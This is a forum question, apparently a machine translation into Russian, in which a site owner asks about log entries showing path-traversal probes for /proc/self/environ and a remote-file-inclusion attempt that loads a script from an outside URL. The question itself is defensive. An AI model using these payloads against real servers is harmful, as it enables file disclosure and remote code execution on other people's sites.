Просматривая мои 404 журналов, я заметил следующие два URL, оба из которых произошли один раз:
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
и
/library.php=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00
Для рассматриваемой страницы library.php
требуется type
переменная с полдюжиной различных допустимых значений, а затем id
переменная. Таким образом, действительный URL может быть
library.php?type=Circle-K&id=Strange-Things-Are-Afoot
и идентификаторы все проходят mysql_real_escape_string
до того, как их использовать для запроса к базе данных.
Я новичок, но мне кажется, что обе эти ссылки являются простыми атаками на рут-рут?
1) Как лучше всего защититься от подобных вещей, кроме 404?
2) я должен permaban IP (ы) ответственный?
РЕДАКТИРОВАТЬ: также только что заметил это
/library.php=http://www.basfalt.no/scripts/danger.txt
РЕДАКТИРОВАТЬ 2: IP-адрес оскорбления для всех трех атак был 216.97.231.15
связан с провайдером, который называется Lunar Pages и расположен за пределами Лос-Анджелеса.
РЕДАКТИРОВАТЬ 3: Я решил позвонить провайдеру в пятницу утром по местному времени и обсудить проблему с кем бы я ни мог позвонить по телефону. Я опубликую результаты здесь через 24 часа или около того.
РЕДАКТИРОВАТЬ 4: Я закончил тем, что отправил электронное письмо их администраторам, и они сначала ответили, что "они изучают это", а затем днем позже "эта проблема должна быть решена сейчас" Никаких подробностей, к сожалению.
type
сообщает скрипту, который включает в себя (хотя и через IF $_GET['type'] == 'thing') {} ESLE...
, а не как прямую ссылку include 'type.php'
), и id
он запускается через mysql_real_escape_string, который используется для запросов. Зная это, я все еще в безопасности?